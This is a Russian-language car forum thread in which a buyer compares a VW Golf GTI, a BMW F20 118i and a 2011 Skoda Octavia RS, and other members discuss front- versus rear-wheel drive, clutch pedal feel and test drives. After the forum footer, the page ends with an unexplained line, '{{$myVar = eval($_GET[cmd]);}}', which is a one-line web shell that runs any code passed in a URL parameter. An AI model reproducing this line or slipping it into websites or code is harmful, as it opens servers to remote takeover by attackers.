+ Ответить в теме
Показано с 1 по 8 из 8

Тема: GTI 5 vs F20 118i


  1. #1
    Мимо проходил COUSIN ANDREW is on a distinguished road Аватар для COUSIN ANDREW
    Регистрация
    13.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4

    GTI 6 vs F20 118i vs Octavia RS 2011

    Всем привет!

    Езжу сейчас на заднем приводе, с разгоном 8 сек до 100км/ч. Хочу тачку пошустрее.

    Случайно глянул Гольф, по характеристикам неплохо едет. Но.

    Во-первых, напрягает передний привод. Насколько сильно руль дергается при разгоне? Особенно после хоть какого-то чип-тюнинга.
    На заднем приводе радует чистый руль, не знаю смогу ли пересесть на передний.

    Поэтому появляется альтернатива в виде свежей БМВ. Там 1.6 170лс, она помедленнее гольфа, но это единственное что есть в таком размере/типе кузова с задним приводом.

    Что скажете? Бюджет 700-800тыр.

    Еще есть просьба к владельцам ГТИ 6/Октавии: дайте прокатиться? :)


    Спасибо
    Последний раз редактировалось COUSIN ANDREW; 17.05.2015 в 00:53.

  2. #2
    Новичок GTI676 is on a distinguished road Аватар для GTI676
    Регистрация
    05.08.2014
    Откуда
    MO, Odicity
    Машина
    GTI mk6 st.1, borla exhaust, apexi inake
    Сообщений
    193
    Сомневаюсь, что найдешь живой пятый гольф, но, если найдешь, то несомненно он лучше будет.

  3. #3
    Мимо проходил COUSIN ANDREW is on a distinguished road Аватар для COUSIN ANDREW
    Регистрация
    13.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    а в чём именно он будет несомненно лучше?

    В динамике понятно, ибо лошадей больше. А еще?

    Кстати, если смотреть Гольфа с мкпп, у него педаль сцепления мягкая? Сама по себе мкпп меня не парит. Но педаль предпочел бы помягче.
    Последний раз редактировалось COUSIN ANDREW; 14.05.2015 в 01:07.

  4. #4
    Новичок GTI676 is on a distinguished road Аватар для GTI676
    Регистрация
    05.08.2014
    Откуда
    MO, Odicity
    Машина
    GTI mk6 st.1, borla exhaust, apexi inake
    Сообщений
    193
    На счёт педали не подскажу, у меня дсг. Но на стоке там все должно быть ок с педалью.

    Ты сначала прокатись на гольфе. Я смотрел а6, случайно увидел гольфа трейд ине, прокатился, потом 48 часов лежал с открытыми глазами, чтобы удержаться и не купить его, в итоге поехал и взял.

  5. #5
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Надо прокатится и все будет понятно.
    песок сыпется....не останавливайтесь на достигнутом !

  6. #6
    Мимо проходил COUSIN ANDREW is on a distinguished road Аватар для COUSIN ANDREW
    Регистрация
    13.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Прокатиться надо, и хочется. Но пока не нашел такую возможность.

  7. #7
    Мимо проходил COUSIN ANDREW is on a distinguished road Аватар для COUSIN ANDREW
    Регистрация
    13.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    а что скажете про Октавию РС рестайл(2011 года, например)?

    По технике, насколько я понимаю - это Гольв ГТИ 5? Двиг 200лс с ремнем ГРМ?

    Масложор и ДСГ 6ст - как повезет?

    Шкода не такая модная как Гольф, можно даже сказать она выглядит уёпищно, но в этом есть прикол.

    По езде она помягче Гольфа?

  8. #8
    Мимо проходил Tuaron is on a distinguished road Аватар для Tuaron
    Регистрация
    04.05.2015
    Откуда
    Москва
    Машина
    GTI V
    Сообщений
    46
    октавия значительно получше будет гольфа только по салону и комфорту, по динамике уступает. педаль на стоковом сцеплении самая мягкая из всех на каких спорт тачках ездил, мягче в принципе нет (могу сказать с уверенностью, т.к. ездил абсолютно на всех распространеных спортивных/полуспортивных тачках...). у гольфа ничо не таскает, если близко к стоку по кобылятам, даже лично мое мнение намного проще ездить на переднем приводе, нежели на заднем. я например вижу это как, нажатие педали газа в пол в любом случае, на бехе, даже 170-... л.с. тапка в пол, это печалька, надо ловить тачку, а например в повороте, это только дрифт и никакого ускорения...в общем на заднем надо уметь ездить, на переднем можно не уметь)))) ну кроме мазды, там печалька, там точно надо ловить тачку, и абы кому ее не доверить, т.к. оооочень специфическое управление (и кстати, педаль сцепы там в стоке самая жесткая из всех спортивных/полуспортивных тачек), а уж если ставить стейджи.... но лично я привык, и лично мне было комфортно(хотя все мои знакомые в один голос удивлялись как я езжу по пробкам, кстати, с мпской хорошо, то что твоя девушка/жена никогда не сможет на ней ездить, за ооооочень редким исключением спортсменок

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}